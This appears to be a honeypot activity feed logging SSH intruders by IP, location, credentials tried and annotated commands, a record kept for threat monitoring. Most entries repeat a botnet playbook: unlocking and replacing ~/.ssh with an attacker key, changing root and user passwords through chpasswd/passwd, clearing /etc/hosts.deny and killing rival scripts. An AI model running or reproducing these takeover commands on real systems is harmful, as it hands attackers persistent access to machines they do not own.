$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:99RwA8acbh0Y"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 baguette_root_9 (88.189.62.241) β€” Suresnes, France Β· 1 session Β· 19 cmds
2026-05-20 23:18 EDT Β· as root/cisco123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:fBCPklcoyLGe"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 eagle_root_40 (44.203.190.34) β€” Ashburn, United States Β· 2 sessions Β· 38 cmds
2026-05-20 22:45 EDT Β· as root/mihoyo123, root/yidong
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:ZqwHUC5KTgw2"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:XMv8lHvrydhA"|chpasswd|bash
🎭 rogue_root_91 (79.125.162.32) β€” Skopje, North Macedonia Β· 1 session Β· 19 cmds
2026-05-20 22:46 EDT Β· as root/mihoyo123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:FNcSjd95rhpu"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_6 (14.103.122.90) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-05-20 22:35 EDT Β· as zhao/zhao
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "zhao\n4JGKO41i0CwB\n4JGKO41i0CwB"|passwd|bash
$ Enter new UNIX password:
$ echo "zhao\n4JGKO41i0CwB\n4JGKO41i0CwB\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 strudel_root_11 (46.101.233.6) β€” Frankfurt am Main, Germany Β· 1 session Β· 1 cmd
2026-05-20 19:44 EDT Β· as jimster/p@ssw0rd2025@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 burger_root_46 (82.197.67.0) β€” Orangeburg, United States Β· 1 session Β· 1 cmd
2026-05-20 19:07 EDT Β· as admin/admin!2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 silk_root_21 (61.151.249.194) β€” Shanghai, China Β· 3 sessions Β· 59 cmds
2026-05-20 18:04 EDT Β· as debian/123456, root/mysql, takashi/takashi
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:0KZpxu1JIf1w"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "123456\nI0bynj6h4uzR\nI0bynj6h4uzR"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123456\nI0bynj6h4uzR\nI0bynj6h4uzR\n"|passwd
$ echo -e "takashi\nGhMAsrTnJr9T\nGhMAsrTnJr9T"|passwd|bash
$ echo "takashi\nGhMAsrTnJr9T\nGhMAsrTnJr9T\n"|passwd
🎭 autobahn_root_9 (162.19.243.145) β€” Limburg an der Lahn, Germany Β· 4 sessions Β· 79 cmds
2026-05-20 18:03 EDT Β· as concourse/concourse, debian/123456, root/mysql
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "takashi\nP9tunJVPjLUf\nP9tunJVPjLUf"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "takashi\nP9tunJVPjLUf\nP9tunJVPjLUf\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:HDPOZPs4v1ub"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "123456\nMuA706aKPVAh\nMuA706aKPVAh"|passwd|bash
$ echo "123456\nMuA706aKPVAh\nMuA706aKPVAh\n"|passwd
$ echo -e "concourse\nz43h85tfraDX\nz43h85tfraDX"|passwd|bash
$ echo "concourse\nz43h85tfraDX\nz43h85tfraDX\n"|passwd
🎭 liberty_root_28 (107.175.54.2) β€” Los Angeles, United States Β· 3 sessions Β· 59 cmds
2026-05-20 18:04 EDT Β· as concourse/concourse, root/mysql, takashi/takashi
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "concourse\nSR01L4UMj1zN\nSR01L4UMj1zN"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "concourse\nSR01L4UMj1zN\nSR01L4UMj1zN\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "takashi\nzwQpQxI21DT8\nzwQpQxI21DT8"|passwd|bash
$ echo "takashi\nzwQpQxI21DT8\nzwQpQxI21DT8\n"|passwd
$ echo "root:4SjLEUyvF6IF"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 yankee_root_37 (98.213.142.168) β€” Rockford, United States Β· 3 sessions Β· 60 cmds
2026-05-20 18:03 EDT Β· as concourse/concourse, debian/123456, takashi/takashi
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "concourse\nAIH6Cz7O98fy\nAIH6Cz7O98fy"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "concourse\nAIH6Cz7O98fy\nAIH6Cz7O98fy\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "takashi\nla6HmSzUfXL8\nla6HmSzUfXL8"|passwd|bash
$ echo "takashi\nla6HmSzUfXL8\nla6HmSzUfXL8\n"|passwd
$ echo -e "123456\nOUQzisblEGIT\nOUQzisblEGIT"|passwd|bash
$ echo "123456\nOUQzisblEGIT\nOUQzisblEGIT\n"|passwd
🎭 rogue_14 (36.92.246.14) β€” Jakarta, Indonesia Β· 1 session Β· 20 cmds
2026-05-20 18:02 EDT Β· as xie/xie123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "xie123\nO3riLUTQA8zO\nO3riLUTQA8zO"|passwd|bash
$ Enter new UNIX password:
$ echo "xie123\nO3riLUTQA8zO\nO3riLUTQA8zO\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 eagle_root_41 (186.241.93.117) β€” Fort Lauderdale, United States Β· 1 session Β· 1 cmd
2026-05-20 17:59 EDT Β· as root/Aa112211.
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 eagle_3 (68.167.181.70) β€” Los Angeles, United States Β· 1 session Β· 20 cmds
2026-05-20 17:16 EDT Β· as bei/bei123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "bei123\ndAkKCT5JJFEG\ndAkKCT5JJFEG"|passwd|bash
$ Enter new UNIX password:
$ echo "bei123\ndAkKCT5JJFEG\ndAkKCT5JJFEG\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_7 (138.124.158.150) β€” Baghdad, Iraq Β· 1 session Β· 20 cmds
2026-05-20 17:11 EDT Β· as ftp/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nvIsvpcWUdRIb\nvIsvpcWUdRIb"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nvIsvpcWUdRIb\nvIsvpcWUdRIb\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 liberty_root_29 (192.34.60.224) β€” North Bergen, United States Β· 1 session Β· 1 cmd
2026-05-20 16:15 EDT Β· as admin/p@ssw0rd2026@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 baguette_root_10 (51.255.200.244) β€” Roubaix, France Β· 1 session Β· 1 cmd
2026-05-20 16:03 EDT Β· as root/123#Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 yankee_root_38 (217.216.93.147) β€” Orangeburg, United States Β· 1 session Β· 1 cmd
2026-05-20 15:22 EDT Β· as jimster/Admin@2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ghost_root_93 (103.245.236.231) β€” QuαΊ­n BΓ¬nh ThαΊ‘nh, Vietnam Β· 1 session Β· 1 cmd
2026-05-20 15:15 EDT Β· as jimster/Welcome@2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 hanbok_root_14 (121.78.158.30) β€” Gangnam-gu, South Korea Β· 1 session Β· 1 cmd
2026-05-20 14:48 EDT Β· as admin/Password
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 kimchi_root_12 (14.206.12.13) β€” Incheon, South Korea Β· 1 session Β· 1 cmd
2026-05-20 14:11 EDT Β· as jimster/Admin2026@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 clog_root_5 (20.123.146.94) β€” Amsterdam, Netherlands Β· 1 session Β· 20 cmds
2026-05-20 13:44 EDT Β· as sunita/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
